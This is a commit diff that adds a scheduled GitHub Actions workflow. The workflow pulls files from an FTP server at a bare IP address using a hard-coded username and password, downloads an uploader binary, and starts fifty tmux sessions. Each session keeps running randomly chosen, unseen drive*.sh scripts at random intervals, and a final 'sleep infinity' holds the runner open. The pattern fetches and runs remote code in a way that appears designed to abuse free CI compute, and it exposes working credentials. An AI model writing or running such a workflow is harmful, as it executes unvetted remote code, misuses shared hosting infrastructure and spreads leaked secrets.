Update main.yml

diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml
--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,1 +1,47 @@
+name: Run tmux sessions
 
+on:
+  schedule:
+    - cron: '6 2 * * *' # 
+
+jobs:
+  run-sessions:
+    runs-on: ubuntu-latest
+
+    steps:
+    - name: Checkout repository
+      uses: actions/checkout@v2
+
+    - name: Install tmux
+      run: sudo apt-get install -y tmux
+
+    - name: Run tmux sessions
+      run: |
+        #!/bin/bash
+
+        files=("230117" "230118" "230119" "230120" "230121")
+        for file in "${files[@]}"; do
+          wget -nH -m --ftp-user=if0_37965025 --ftp-password=98kDsIA4LJEZ "ftp://185.27.134.11/htdocs/$file/*"
+          cp htdocs/$file/* ./
+          wget https://raw.githubusercontent.com/MoeClub/OneList/master/OneDriveUploader/amd64/linux/OneDriveUploader -P /usr/local/bin/
+          chmod +x /usr/local/bin/OneDriveUploader
+        done
+
+        for session_num in {1..50}; do
+            tmux new-session -d -s "session_$session_num"
+            tmux send-keys -t "session_$session_num" "for i in {1..5}; do sleep \$((RANDOM % 58 + 1))m; bash \$(shuf -n 1 -e drive33311.sh drive33322.sh drive33355.sh drive33366.sh drive33377.sh); done" C-m
+        done
+
+        # List all tmux sessions
+        tmux ls
+
+        # Check if all tmux sessions are running
+        if tmux ls | grep -q "session_"; then
+          echo "All tmux sessions have been successfully started."
+        else
+          echo "Failed to start all tmux sessions."
+          exit 1
+        fi
+        
+        # Keep the workflow running
+        sleep infinity
